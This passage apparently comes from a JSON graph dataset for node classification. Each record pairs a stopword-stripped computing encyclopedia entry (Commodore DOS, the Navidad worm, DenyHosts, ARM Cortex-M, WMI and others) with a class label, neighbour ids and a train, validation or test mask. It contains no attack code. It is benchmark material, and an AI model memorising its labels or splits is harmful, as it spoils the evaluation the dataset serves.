    "text": "Cloud28+:cloud28+ cloud28+ worldwide cloud computing services marketplace federation cloud computing organizations developed sponsored hewlett packard enterprise hpe december 2016 world biggest aggregator cloud computing services federation originally launched europe march 2015 aim accelerating cloud adoption europe opened members worldwide november 2016 point around 330 member companies offered around 1,300 infrastructure-as-a-service iaas platform-as-a-service paas software-as-a-service saas services cloud28+ launched hpe event frankfurt germany march 2015 development since april 2014 purpose creating single catalogue european cloud computing services hp trying figure grow ecosystem cloud suppliers europe mapping services providers isvs resellers according hp executive xavier poisson gouyou beauchamps 6 june 2017 poisson cloud leadership award 2017 datacloud europe judges citing growth cloud28+ making selection microsoft joined cloud28+ technology partner july 2017 pledging collaborate hpe create new on-boarding programme designed bring independent software vendors isvs marketplace february 2018 mphasis partnered hpe cloud28+ specific solutions services launch cloud28+ required services catalog built hpe helion version openstack open-source cloud software platform may 2016 support extended include microsoft azure vmware docker technologies service hub also extended app center automates installation docker-based applications",
    "neighbors": [
      4194,
      1638,
      6153,
      1935,
      467,
      2910
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4762,
    "label": 4,
    "text": "University_Toolkit:university toolkit university toolkit software package developed mpaa university system administrators track log types much traffic goes network internet provided university toolkit available free online developer ubuntu operating system toolkit based contacted mpaa requested taken citing gpl violations stating gpl software must source code released gpl well mpaa released source code university toolkit despite supposedly based entirely open-source software specifically snort ntop",
    "neighbors": [
      9142,
      3486
    ],
    "mask": "None"
  },
  {
    "node_id": 4763,
    "label": 6,
    "text": "Large-file_support:large-file support large-file support lfs term frequently applied ability create files larger either 2 4 gib 32-bit filesystems traditionally many operating systems underlying file system implementations used 32-bit integers represent file sizes positions consequently file could larger 2 − 1 bytes 4 gib − 1 many implementations problem exacerbated treating sizes signed numbers lowered limit 2 − 1 bytes 2 gib − 1 files large 32-bit operating systems handle came known large files limit quite acceptable time hard disks smaller general increase storage capacity combined increased server desktop file usage especially database multimedia files led intense pressure os vendors remove limitation 1996 multiple vendors responded forming industry initiative known large file summit obvious backronym lfs summit tasked define standardized way switch 64-bit numbers represent file sizes merely ensuring sizes treated unsigned numbers would increase limit 2 gib−1 4 gib−1 would stopgap measure given explosive growth data storage nevertheless windows 95b dos 7.10 introduced api extension notably extended file open call access files full 4 gib−1 bytes possible fat16b fat32 volumes applications aware extension continue use traditional file open call thereby still limited maximum 2 gib−1 bytes backward compatibility switch caused deployment issues required design modifications consequences still seen",
    "neighbors": [
      1501,
      2432,
      3744,
      9665,
      9762,
      5413,
      11418,
      10763,
      6797,
      1775,
      2193,
      2197,
      2901,
      3834,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4764,
    "label": 2,
    "text": "Commodore_DOS:commodore dos commodore dos also known cbm dos disk operating system used commodore 8-bit computers unlike doses loaded disk computer ram executed cbm dos executed internally drive dos resides rom chips inside drive run one dedicated mos 6502 family cpus thus data transfer commodore 8-bit computers disk drives closely resembles local area network connection typical disk/host transfers least seven distinctly numbered versions commodore dos known exist following list gives version numbers related disk drives unless otherwise noted drives 5¼-inch format lp code designates low profile drives drives whose model number starts 15 connect via commodore unique cbm-488 serial talk/listen protocols others use parallel ieee-488 version 2.6 far commonly used known dos version due use 1541 part c64 systems revised firmware 1571 fixed relative file bug also identified v3.0 thus possible tell two versions apart version number alone 1541 commodore floppy disk contain 144 files flat namespace subdirectories directory stored reserved track 18 located halfway hub edge 35-track single-sided disk file name may 16 bytes length theoretically unique using direct access methods directory structure possible rename file another—although accessing files may difficult impossible files identical names usually serve purpose except inform visually manage files one popular trick used example final cartridge iii add files named codice_1 type codice_2 directory files could rearranged around lines form groups many game developers warez group members demoscene hackers used clever custom directory entries well file names may contain shifted space character codice_3 directory listing viewed basic portion file name beyond codice_3 character appear separated first part file name quotation mark causing basic consider part full file name feature used create directory entries appear directory listing example user moves cursor beginning line types word codice_5 file size presses basic interprets causing program loaded memory anything colon secondary address executed since computer ignores command load alternatively user could press program automatically null byte embedded file name interrupt listing loading basic three null bytes makes difficult list basic many machine language programmers would experiment null bytes attempt make harder basic programmers access code tamper basic directory accessed non-executable pseudo-basic program case dual drive followed codice_6 first line line number 0 1 indicating drive number showing reverse video name id disk shorthand code dos version created codes vary far dos versions use incompatible disk formats 2a used 5.25-inch dos versions 3d the-3.5 inch 1581 lines size file disk blocks pseudo line number followed file name quotes three-letter type code last line shows number unallocated blocks disk pseudo line number followed words blocks free commodore 64 entering flood screen garbage instead loading directory basic ram drive assigns directory load address 0401 1025 equivalent start basic commodore pet corresponds default screen memory c64 starting second character first line screen viewing directory command overwrites basic program memory dos wedge various third-party cartridges extenders epyx fastload action replay final cartridge iii allow viewing disk directory using special commands load directory screen memory without destroying current basic program versions commodore basic include codice_7 codice_8 command performs function following file types supported presence asterisk codice_19 prepended file type directory listing example codice_20 indicates file properly closed writing drive commanded close file opened writing associated buffer flushed disk block availability map bam updated accurately reflect blocks used program crash problem user removing disk file open results orphan file also referred poison splat file buffers flushed bam accurately reflect disk usage putting disk risk corruption poison file generally accessed opened modify mode attempt use dos codice_21 command delete file may cause filesystem corruption crosslinking practical method removing one files opening file modify mode fixing validating disk see dos codice_22 command latter rebuilds bam removes poison file references directory infamous save-with-replace bug could result creation splat files codice_23 special type written on-disk directory entry files deleted files shown normal directory listing data blocks directory entries reused files subsequently created utility programs allow un-deletion files data blocks directory entries yet overwritten files codice_24 commonly used insert banners comment sections directory listing file types codice_25 example codice_26 locked deleted—they opened reading however commodore dos command explicitly set clear status many third-party utilities written allow done utilities generally read directory using direct-access commands perform necessary modifications raw data write changes back disk accessing files primarily issue host computer kernal rom computer contains necessary primitive routines needed access files basic rom contains higher level abstraction file access using basic syntax components concern dos file name parsing secondary address section give overview necessary basic commands sake completeness opening file commodore disk unit entails processing number parameters vaguely analogous file opening procedures environments since dos actually running drive controller file opening sequence must pass enough information drive assure unambiguous interpretation typical statement basic write sequential file would follows parameters following codice_27 verb follows files also loaded saved codice_5 codice_34 commands file name specifiers also used example saves basic program codice_12 program file saves basic program sequential file secondary address n't specified specified 0 e.g file saved/loaded basic memory area c64 starts default 0801 secondary address specified non-zero value e.g program loaded starting address specified file prg header first two bytes file —this form command common loading machine code programs load relocation first introduced vic-20 machine could start basic ram several different locations depending memory expansion installed older commodore pet series support relocation would effect file would loaded memory region saved load relocation happens host exception said secondary address used device-internally since pet relocate files basic programs written later commodore machines must modified using sector editor change header bytes also possible use pet built-in machine language monitor change link address basic program loading command load first program disk starting file-specified memory location one popular load commands platforms method start majority commercial software example note fact wildcard expansion pick first catalog name file disk accessed name last-used file kept memory subsequent commands load file rather first however always load first file disk directories disks two-drive units accessed codice_36 codice_37 access directory actual files one drive happen named codice_38 partial directories loaded adding colon template example would load partial directory shows files whose name starts letter k type prg partial directories still contain initial disk name line final blocks free line commodore dos also offers save-with-replace command allows file saved existing file without need first codice_39 existing file done prepending codice_40 symbol file name codice_27 codice_34 operation instance years rumors spread beginning 4040 drive bug command implementation first denied commentators prizes offered prove existence bug early 1985 compute magazine advised readers avoid using command year various authors independently published articles proving save-with-replace bug real including methods could triggered affected devices included single-drive 1541 dual-drive 4040 8050 8250 exhibit issue commentators suggested bug could avoided always explicitly specifying codice_29 drive number saving though later shown disk operations without drive number sufficient lead bug bug stemmed fact affected dos implementations modified versions dos contained earlier commodore pet dual drives 8050 created phantom drive codice_44 single-drive systems resulting allocation unnecessary buffer conditions since save-with-replace command used five drive buffers method phantom buffer allocated meet specifications resulted scrambled data written disk conditions september 1986 philip a. slaymaker published article describing great detail cause bug providing patches 1541 drive roms readers eprom burner could produce patched roms could swapped drive commodore made aware slaymaker findings never issued official update original 1541 roms fix bug revision 5 1571 roms also roms 1541-c 1541-ii drives although supported commodore known 1541-ii firmware 1541-c also used original 1541 drive using eproms fix bug drive well previously noted commodore dos accessed via command channel using syntax like used access files issuing commands dos retrieving status error messages generated response commands accomplished opening file device using 15 secondary address example retrieve display device status one could code example codice_45 hold error number zero error exists codice_46 terse text description error codice_47 represent disk track error occurred codice_31 sector track codice_47 error refers error exists equivalent returned four variables note codice_50 run mode verb also programs issue many disk commands customary open file device command channel start program close program finished commodore basic versions 4.0 later provide pseudo-variable referred codice_51 may used retrieve drive status lieu code reserved variable available earlier versions basic command channel must manually read demonstrated note immediately power-on reset dos revision returned example 1541 return error code 73 common drive models may used determine drive reset power-on state also command seeking relative type files codice_52 several block-level direct-access commands codice_53 codice_54 codice_55 block management codice_56 codice_57 drive memory manipulation execution program code drive processor codice_58 codice_59 codice_60 codice_61 user-definable functions codice_62 codice_63 commands theoretically user-definable functions rededicated accessing new functionality dos versions 1.0",
    "neighbors": [
      9477,
      10257,
      6675,
      6167,
      9756,
      6813,
      7969,
      5293,
      8494,
      823,
      6843,
      9549,
      477,
      11494,
      2665,
      5359,
      1776,
      7281,
      2933
    ],
    "mask": "Train"
  },
  {
    "node_id": 4765,
    "label": 4,
    "text": "Navidad_virus:navidad virus w32.navidad mass-mailing worm program virus discovered december 2000 designed spread email clients microsoft outlook masquerading electronic christmas card infected computers identified blue eye icons appear windows system tray users move mouse cursor eye icons presented variety different messages including one states emmanuel-god us may god bless u.and ash lk lj",
    "neighbors": [
      2041,
      7515,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 4766,
    "label": 3,
    "text": "Golden_Basket:golden basket golden basket 1990 computer basketball game developed published opera soft opera sports label zx spectrum amstrad cpc msx ms-dos game features five-a-side basketball match showing lateral view",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4767,
    "label": 3,
    "text": "Socket_AM3+:socket am3+ am3+ modification am3 socket released mid-2011 designed cpus use amd bulldozer microarchitecture retains compatibility am3 processors vishera line amd cpus also use socket am3+ am3+ socket specification contains noteworthy design changes am3 predecessor 942 pin count am3+ increase one compared am3 socket layout am3+ socket larger pin socket diameter 0.51 mm compared 0.45 mm am3 socket faster serial link 3400 khz cpu power controller compared 400 khz am3+ socket offers improved power regulation power quality specifications including increased maximum current support 145 versus 110 also redesigned cpu cooler retention harness allowing slightly better airflow cpu cooling retaining cooler backward compatibility manufacturers brought am3+ support am3 motherboards via simple bios upgrade mechanical compatibility confirmed possible am3+ cpus fit am3 boards provided supply enough peak current another issue use sideband temperature sensor interface reading temperature cpu therefore cpu pwm fan headers may run full speed also certain power-saving features may work due lack support rapid vcore switching am3+ cpus technically pin-compatible am2 am2+ boards work due lack ddr2 controller cpu 4 holes fastening heatsink motherboard placed rectangle lateral lengths 48 mm 96 mm amd sockets socket am2 socket am2+ socket am3 socket am3+ socket fm2 cooling solutions therefore interchangeable",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      5645,
      398,
      7058,
      10260,
      4246,
      7963,
      2463,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      10833,
      7122,
      9427,
      7132,
      2525,
      1501,
      4451,
      5859,
      1515,
      1260,
      7788,
      7151,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 4768,
    "label": 5,
    "text": "VoiceXML:voicexml voicexml vxml digital document standard specifying interactive media voice dialogs humans computers used developing audio voice response applications banking systems automated customer service portals voicexml applications developed deployed manner analogous web browser interprets visually renders hypertext markup language html receives web server voicexml documents interpreted voice browser common deployment architectures users interact voice browsers via public switched telephone network pstn voicexml document format based extensible markup language xml standard developed world wide web consortium w3c voicexml applications commonly used many industries segments commerce applications include order inquiry package tracking driving directions emergency notification wake-up flight tracking voice access email customer relationship management prescription refilling audio news magazines voice dialing real-estate information national directory assistance applications voicexml tags instruct voice browser provide speech synthesis automatic speech recognition dialog management audio playback following example voicexml document interpreted voicexml interpreter output hello world synthesized speech typically http used transport protocol fetching voicexml pages applications may use static voicexml pages others rely dynamic voicexml page generation using application server like tomcat weblogic iis websphere historically voicexml platform vendors implemented standard different ways added proprietary features voicexml 2.0 standard adopted w3c recommendation 16 march 2004 clarified areas difference voicexml forum industry group promoting use standard provides conformance testing process certifies vendors implementations conformant corporation ibm lucent motorola formed voicexml forum march 1999 order develop standard markup language specifying voice dialogs september 1999 forum released voicexml 0.9 member comment march 2000 published voicexml 1.0 soon afterwards forum turned control standard w3c w3c produced several intermediate versions voicexml 2.0 reached final recommendation stage march 2004 voicexml 2.1 added relatively small set additional features voicexml 2.0 based feedback implementations 2.0 standard backward compatible voicexml 2.0 reached w3c recommendation status june 2007 voicexml 3.0 next major release voicexml new major features includes new xml statechart description language called scxml w3c speech interface framework also defines standards closely associated voicexml speech recognition grammar specification srgs used tell speech recognizer sentence patterns expect hear patterns called grammars speech recognizer determines likely sentence heard needs extract semantic meaning sentence return voicexml interpreter semantic interpretation specified via semantic interpretation speech recognition sisr standard sisr used inside srgs specify semantic results associated grammars i.e. set ecmascript assignments create semantic structure returned speech recognizer speech synthesis markup language ssml used decorate textual prompts information best render synthetic speech example speech synthesizer voice use speak louder softer pronunciation lexicon specification pls used define words pronounced generated pronunciation information meant used speech recognizers speech synthesizers voice browsing applications call control extensible markup language ccxml complementary w3c standard ccxml interpreter used voicexml platforms handle initial call setup caller voice browser provide telephony services like call transfer disconnect voice browser ccxml also used non-voicexml contexts media server applications often necessary several call legs interact example multi-party conference deficiencies identified voicexml application companies designed specific scripting languages deal environment media server markup language msml convedia solution media server control markup language mscml snowshore solution snowshore owned dialogic convedia owned radisys languages also contain 'hooks external scripts like voicexml run call legs ivr functionality required ietf working group called mediactrl media control working successor scripting systems hoped progress open widely adopted standard",
    "neighbors": [
      11650,
      8070,
      7943,
      5907,
      8854,
      2590,
      7455,
      10910,
      10791,
      6838,
      10557,
      11004,
      3533,
      1363,
      214,
      4439,
      8923,
      479,
      225,
      6629,
      4461,
      10611,
      4213,
      502,
      6775,
      2296,
      10486,
      3323,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 4769,
    "label": 9,
    "text": "Simon_Peyton_Jones:simon peyton jones simon peyton jones born 18 january 1958 british computer scientist researches implementation applications functional programming languages particularly lazy functional programming peyton jones graduated trinity college cambridge 1980 went complete cambridge diploma computer science peyton jones worked industry two years serving lecturer university college london 1990 1998 professor university glasgow since 1998 worked researcher microsoft research cambridge england major contributor design haskell programming language lead developer glasgow haskell compiler ghc also co-creator programming language designed intermediate program representation language-specific front-end compiler general-purpose back-end code generator optimiser c -- used ghc also major contributor 1999 book cybernauts awake explored ethical spiritual implications internet peyton jones chairs computing school cas group organisation aims promote teaching computer science school following efforts 2019 appointed chair newly founded uk national centre computing education 2004 inducted fellow association computing machinery contributions functional programming languages 2011 received membership academia europaea 2011 simon marlow awarded sigplan programming languages software award work ghc received honorary doctorate university glasgow 2013 honorary doctorate university kent 2017 elected fellow royal society frs 2016 distinguished fellow british computer society dfbcs 2017",
    "neighbors": [
      3876,
      1382,
      1768,
      4392,
      6536,
      8491,
      2381,
      3823,
      1783,
      9914,
      2682,
      219,
      5885
    ],
    "mask": "None"
  },
  {
    "node_id": 4770,
    "label": 9,
    "text": "Very_high-level_programming_language:high-level programming language high-level programming language vhll programming language high level abstraction used primarily professional programmer productivity tool high-level programming languages usually domain-specific languages limited specific application purpose type task often scripting languages especially extension languages controlling specific environment reason high-level programming languages often referred goal-oriented programming languages term vhll used 1990s today often called high-level programming languages used scripting perl python ruby visual basic",
    "neighbors": [
      9345,
      2691,
      8582,
      6919,
      9224,
      5395,
      5651,
      5527,
      9626,
      3613,
      9245,
      5680,
      9780,
      1591,
      4410,
      191,
      4035,
      10819,
      8262,
      9926,
      4042,
      847,
      5585,
      5845,
      477,
      8671,
      7395,
      4838,
      11497,
      8554,
      9330,
      9331,
      2556,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 4771,
    "label": 2,
    "text": "Windows_Management_Instrumentation:windows management instrumentation windows management instrumentation wmi consists set extensions windows driver model provides operating system interface instrumented components provide information notification wmi microsoft implementation web-based enterprise management wbem common information model cim standards distributed management task force dmtf wmi allows scripting languages vbscript windows powershell manage microsoft windows personal computers servers locally remotely wmi comes preinstalled windows 2000 newer microsoft oses available download windows nt windows 95 windows 98 microsoft also provides command-line interface wmi called windows management instrumentation command-line wmic purpose wmi define proprietary set environment-independent specifications allow management information shared management applications wmi prescribes enterprise management standards related technologies windows work existing management standards desktop management interface dmi snmp wmi complements standards providing uniform model model represents managed environment management data source accessed common way wmi abstracts manageable entities cim collection providers development provider implies several steps major steps summarized follows since release first wmi implementation windows nt 4.0 sp4 era out-of-band download microsoft consistently added wmi providers windows many customers interpreted growth numbers providers sign wmi become microsoft ubiquitous management layer windows even microsoft never made commitment explicit constant increasing exposure management data wmi windows people systems management field started develop scripts automation procedures based wmi beyond scripting needs leading management-software packages mom sccm ads hp openview windows hpov bmc software ca inc. wmi-enabled capable consuming providing wmi information various user interfaces enables administrators operators capable scripting programming top wmi enjoy benefits wmi without even learning however want wmi scriptable gives opportunity consume wmi information scripts wmi-aware enterprise-management software someone willing develop one many wmi providers wmi offers many features box important advantages wmi tools also useful design development phases tools .net framework managementclass class represents common information model cim management class wmi class win32_logicaldisk case disk drive win32_process running program like notepad.exe example shows msndis_80211_servicesetidentifier wmi class used find ssid wi-fi network system currently connected language c msndis_80211_servicesetidentifier wmi class supported windows xp windows server 2003 wmi extensions wdm provide kernel-level instrumentation publishing information configuring device settings supplying event notification device drivers allowing administrators set data security wmi provider known wdm provider extensions part wdm architecture however broad utility used types drivers well scsi ndis wmi driver extensions service monitors drivers event trace providers configured publish wmi event trace information instrumented hardware data provided way drivers instrumented wmi extensions wdm wmi extensions wdm provide set windows device driver interfaces instrumenting data within driver models native windows oems ihvs easily extend instrumented data set add value hardware/software solution wmi driver extensions however supported windows vista later operating systems",
    "neighbors": [
      9216,
      9728,
      10243,
      11270,
      2568,
      5643,
      4624,
      10769,
      6674,
      1043,
      9234,
      6168,
      537,
      8729,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      4143,
      9263,
      9780,
      1077,
      2101,
      1079,
      8246,
      11316,
      10812,
      3133,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      11344,
      4178,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      5225,
      622,
      1647,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      8315,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      6281,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      7838,
      9377,
      3235,
      6820,
      7846,
      1703,
      7847,
      2221,
      10414,
      3250,
      5300,
      9910,
      7351,
      7356,
      2749,
      10428,
      2244,
      8391,
      200,
      9420,
      1741,
      7893,
      214,
      1750,
      9943,
      9434,
      9946,
      2782,
      2783,
      736,
      4321,
      6370,
      9441,
      4836,
      9442,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      10486,
      3834,
      6396,
      1791,
      8959,
      11519,
      6927,
      3856,
      8976,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      9505,
      5413,
      2854,
      11559,
      296,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5437,
      5952,
      3394,
      1348,
      8517,
      844,
      6476,
      3922,
      4439,
      5465,
      10079,
      11616,
      2402,
      2919,
      4458,
      6506,
      9066,
      2413,
      6511,
      1400,
      9593,
      6523,
      2943,
      3970,
      10631,
      9609,
      1418,
      5003,
      5004,
      9612,
      2959,
      8080,
      4505,
      9114,
      11677,
      10654,
      8607,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      10673,
      9655,
      6584,
      1978,
      2493,
      960,
      9665,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      10727,
      4074,
      9196,
      6637,
      4590,
      9709,
      11247,
      2545,
      6641,
      11249,
      8692,
      3573,
      10229,
      10747,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 4772,
    "label": 4,
    "text": "DenyHosts:denyhosts denyhosts log-based intrusion-prevention security tool ssh servers written python intended prevent brute-force attacks ssh servers monitoring invalid login attempts authentication log blocking originating ip addresses denyhosts developed phil schwartz also developer kodos python regular expression debugger denyhosts checks end authentication log recent failed login attempts records information originating ip addresses compares number invalid attempts user-specified threshold many invalid attempts assumes dictionary attack occurring prevents ip address making attempts adding codice_1 server denyhosts 2.0 support centralized synchronization repeat offenders blocked many computers site denyhosts.net gathers statistics computers running software denyhosts restricted connections using ipv4 work ipv6 denyhosts may run manually daemon cron job july 2007 register reported may july year compromised computers oracle uk listed among ten worst offenders launching brute force ssh attacks internet according public denyhosts listings investigation oracle able refute suggestions computers compromised daniel b. cid wrote paper showing denyhosts well similar programs fail2ban blockhosts vulnerable remote log injection attack technique similar sql injection specially crafted user name used trigger block site chosen attacker fixed version 2.6 since development original author phil schwartz release version 2.6 december 2006 claimed version 2.7 november 2008 actual downloadable package available development first continued february 2012 matt ruffalo github repository independent separate fork started almost-identically named denyhost sourceforge project site release different version 2.7 may 2014 version 2.9 new sourceforge project merged earlier github repository newer versions available via means software runs centralized synchronization server denyhosts versions 2.0 use never released independent synchronization server software developed jan-pascal van best since june 2015 general references",
    "neighbors": [
      5470,
      899,
      2884,
      3717,
      7556,
      7557,
      10341,
      8554,
      7983,
      11407,
      11221,
      823,
      186,
      6363,
      5469,
      4349,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4773,
    "label": 3,
    "text": "ARM_Cortex-M:arm cortex-m arm cortex-m group 32-bit risc arm processor cores licensed arm holdings intended microcontroller use shipped tens billions devices cores consist cortex-m0 cortex-m0+ cortex-m1 cortex-m3 cortex-m4 cortex-m7 cortex-m23 cortex-m33 cortex-m35p cortex-m4 m7 m33 m35p cores fpu silicon option included silicon cores known cortex-mx fpu cortex-mxf x core number arm cortex-m family arm microprocessor cores designed use microcontrollers asics assps fpgas socs cortex-m cores commonly used dedicated microcontroller chips also hidden inside soc chips power management controllers i/o controllers system controllers touch screen controllers smart battery controllers sensors controllers though 8-bit microcontrollers popular past cortex-m slowly chipping away 8-bit market prices low-end cortex-m chips moved downward cortex-m become popular replacements 8-bit chips applications benefit 32-bit math operations replacing older legacy arm cores arm7 arm9 arm holdings neither manufactures sells cpu devices based designs rather licenses processor architecture interested parties arm offers variety licensing terms varying cost deliverables licensees arm provides integratable hardware description arm core well complete software development toolset right sell manufactured silicon containing arm cpu integrated device manufacturers idm receive arm processor ip synthesizable rtl written verilog form ability perform architectural level optimizations extensions allows manufacturer achieve custom design goals higher clock speed low power consumption instruction set extensions including floating point optimizations size debug support etc determine components included particular arm cpu chip consult manufacturer datasheet related documentation silicon options cortex-m cores additional silicon options cortex-m0 m0+ m1 implement armv6-m architecture cortex-m3 implements armv7-m architecture cortex-m4 cortex-m7 implements armv7e-m architecture architectures binary instruction upward compatible armv6-m armv7-m armv7e-m. binary instructions available cortex-m0 cortex-m0+ cortex-m1 execute without modification cortex-m3 cortex-m4 cortex-m7 binary instructions available cortex-m3 execute without modification cortex-m4 cortex-m7 cortex-m33 cortex-m35p thumb-1 thumb-2 instruction sets supported cortex-m architectures legacy 32-bit arm instruction set n't supported six cortex-m cores implement common subset instructions consists thumb-1 thumb-2 including 32-bit result multiply cortex-m0 cortex-m0+ cortex-m1 cortex-m23 designed create smallest silicon die thus fewest instructions cortex-m family cortex-m0 m0+ m1 include thumb-1 instructions except new instructions cbz cbnz added armv7-m architecture cortex-m0 m0+ m1 include minor subset thumb-2 instructions bl dmb dsb isb mrs msr cortex-m3 m4 m7 m33 m35p base thumb-1 thumb-2 instructions cortex-m3 adds three thumb-1 instructions thumb-2 instructions hardware integer divide saturation arithmetic instructions cortex-m4 adds dsp instructions optional single-precision floating-point unit vfpv4-sp cortex-m7 adds optional double-precision fpu vfpv5 cortex-m23 m33 add trustzone instructions arm architecture arm cortex-m series removed features older legacy cores capabilities 32-bit arm instruction set duplicated many ways thumb-1 thumb-2 instruction sets arm features n't similar feature 16-bit thumb-1 instruction set evolved time since first released legacy arm7t cores armv4t architecture new thumb-1 instructions added legacy armv5 armv6 armv6t2 architectures released 16-bit thumb-1 instructions removed cortex-m cores cortex-m0 core optimized small silicon die size use lowest price chips key features cortex-m0 core silicon options following microcontrollers based cortex-m0 core following chips cortex-m0 secondary core cortex-m0+ optimized superset cortex-m0 cortex-m0+ complete instruction set compatibility cortex-m0 thus allowing use compiler debug tools cortex-m0+ pipeline reduced 3 2 stages lowers power usage addition debug features existing cortex-m0 silicon option added cortex-m0+ called micro trace buffer mtb provides simple instruction trace buffer cortex-m0+ also received cortex-m3 cortex-m4 features added silicon options memory protection unit mpu vector table relocation key features cortex-m0+ core silicon options following microcontrollers based cortex-m0+ core following chips cortex-m0+ secondary core smallest arm microcontrollers cortex-m0+ type 2014 smallest 1.6 mm 2 mm kinetis kl03 21 june 2018 world smallest computer computer device announced based arm cortex-m0+ including ram wireless transmitters receivers based photovoltaics university michigan researchers 2018 symposia vlsi technology circuits paper 0.04mm3 16nw wireless batteryless sensor system integrated cortex-m0+ processor optical communication cellular temperature measurement device 1/10th size ibm previously claimed world-record-sized computer months back march 2018 smaller grain salt cortex-m1 optimized core especially designed loaded fpga chips key features cortex-m1 core silicon options following vendors support cortex-m1 soft-cores fpga chips key features cortex-m3 core silicon options following microcontrollers based cortex-m3 core following chips cortex-m3 secondary core following fpgas include cortex-m3 core following vendors support cortex-m3 soft-cores fpga chips conceptually cortex-m4 cortex-m3 plus dsp instructions optional floating-point unit fpu core fpu known cortex-m4f key features cortex-m4 core silicon options following microcontrollers based cortex-m4 core following microcontrollers based cortex-m4f m4 fpu core following chips either cortex-m4 m4f secondary core cortex-m7 high-performance core almost double power efficiency older cortex-m4 features 6-stage superscalar pipeline branch prediction optional floating-point unit capable single-precision optionally double-precision operations instruction data buses enlarged 64-bit wide previous 32-bit buses core contains fpu known cortex-m7f otherwise cortex-m7 key features cortex-m7 core silicon options following microcontrollers based cortex-m7 core cortex-m23 core announced october 2016 based newer armv8-m architecture previously announced november 2015 conceptually cortex-m23 similar cortex-m0+ plus integer divide instructions trustzone security features also 2-stage instruction pipeline key features cortex-m23 core silicon options following microcontrollers based cortex-m23 core cortex-m33 core announced october 2016 based newer armv8-m architecture previously announced november 2015 conceptually cortex-m33 similar cross cortex-m4 cortex-m23 also 3-stage instruction pipeline key features cortex-m33 core silicon options following microcontrollers based cortex-m33 core cortex-m35p core announced may 2018 conceptually cortex-m33 core new instruction cache plus new tamper-resistant hardware concepts borrowed arm securcore family configurable parity ecc features limited public information currently available cortex-m35p technical reference manual released 2019 following microcontrollers based cortex-m35p core documentation arm chips extensive past 8-bit microcontroller documentation would typically fit single document microcontrollers evolved everything required support documentation package arm chips typically consists collection documents ic manufacturer well cpu core vendor arm holdings typical top-down documentation tree ic manufacturers additional documents evaluation board user manuals application notes getting started guides software library documents errata see external links section links official arm documents",
    "neighbors": [
      7170,
      11267,
      10767,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      8231,
      4139,
      2097,
      11314,
      8250,
      6716,
      8253,
      6207,
      7745,
      7234,
      7235,
      7747,
      11333,
      2635,
      8268,
      3159,
      7774,
      99,
      7269,
      1126,
      8812,
      11374,
      7281,
      10361,
      1660,
      638,
      11395,
      644,
      8842,
      7820,
      11405,
      146,
      659,
      1170,
      9366,
      7833,
      666,
      5786,
      9371,
      6815,
      4258,
      4773,
      682,
      9391,
      2224,
      3762,
      11447,
      9913,
      5823,
      8383,
      10945,
      2242,
      9928,
      9932,
      4821,
      11487,
      2788,
      5348,
      5861,
      5355,
      9964,
      6391,
      3835,
      2814,
      781,
      6925,
      6415,
      7445,
      6950,
      5417,
      2862,
      3886,
      11054,
      7988,
      8501,
      10548,
      11062,
      1849,
      6971,
      8508,
      10562,
      8003,
      6981,
      5963,
      8523,
      1871,
      1872,
      5457,
      2388,
      9044,
      6495,
      1377,
      8551,
      11629,
      6001,
      373,
      11125,
      392,
      3467,
      398,
      6033,
      1428,
      5529,
      4508,
      6050,
      5028,
      7077,
      9638,
      7604,
      1461,
      9155,
      9163,
      6607,
      6608,
      7631,
      980,
      2517,
      9174,
      9685,
      10199,
      4569,
      2524,
      9182,
      2019,
      3050,
      10734,
      1014,
      3575,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4774,
    "label": 9,
    "text": "Planner_(programming_language):planner programming language planner often seen publications planner although acronym programming language designed carl hewitt mit first published 1969 first subsets micro-planner pico-planner implemented essentially whole language implemented popler julian davies university edinburgh pop-2 programming language derivations qa4 conniver qlisp ether see scientific community metaphor important tools artificial intelligence research 1970s influenced commercial developments kee art two major paradigms constructing semantic software systems procedural logical procedural paradigm epitomized lisp mccarthy et al 1962 featured recursive procedures operated list structures logical paradigm epitomized uniform proof procedure resolution theorem provers robinson 1965 according logical paradigm “ cheating ” incorporate procedural knowledge green 1969 planner invented purposes procedural embedding knowledge hewitt 1971 rejection resolution uniform proof procedure paradigm robinson 1965 planner kind hybrid procedural logical paradigms combined programmability logical reasoning planner featured procedural interpretation logical sentences implication form p implies q procedurally interpreted following ways using pattern-directed invocation respect development planner influenced natural deductive logical systems especially one frederic fitch 1952 subset called micro-planner implemented gerry sussman eugene charniak terry winograd sussman charniak winograd 1971 used winograd natural-language understanding program shrdlu eugene charniak story understanding work thorne mccarty work legal reasoning projects generated great deal excitement field ai also generated controversy proposed alternative logic approach one mainstay paradigms ai sri international jeff rulifson jan derksen richard waldinger developed qa4 built constructs planner introduced context mechanism provide modularity expressions database earl sacerdoti rene reboh developed qlisp extension qa4 embedded interlisp providing planner-like reasoning embedded procedural language developed rich programming environment qlisp used richard waldinger karl levitt program verification 